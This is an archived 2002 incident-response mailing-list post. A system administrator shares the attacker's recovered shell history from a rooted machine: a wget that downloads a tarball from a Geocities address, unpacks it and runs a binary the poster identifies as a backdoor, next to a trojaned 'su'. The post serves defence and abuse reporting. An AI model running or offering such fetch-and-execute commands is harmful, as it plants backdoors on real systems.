Hosting Provided By

Re: Rooted, .haos on system

From: Damian Gerow <damian(at)sentex.net>
Date: Mon Dec 16 2002 - 13:47:28 EST

On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:

And one last tidbit...

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other file contained within loc.tgz looks like a trojaned 'su'.

I've already notified Geocities abuse, and haven't heard back from them yet.

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Mon Dec 16 14:19:52 2002

This message: [ Message body ]
Next message: george.wasgatt(at)insurity.com: "RE: Win2k Audit Logs - What happened here?"
Previous message: Kevin Bowman: "Re: Logs: Many hits with source port of 80"
In reply to Damian Gerow: "Re: Rooted, .haos on system"
Next in thread: Mike Katz: "Re: Rooted, .haos on system"
Reply: Mike Katz: "Re: Rooted, .haos on system"
Reply: zeno: "Re: Rooted, .haos on system"
Reply: Carlos Eduardo Pedroza Santiviago: "Re: Rooted, .haos on system"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:54 EDT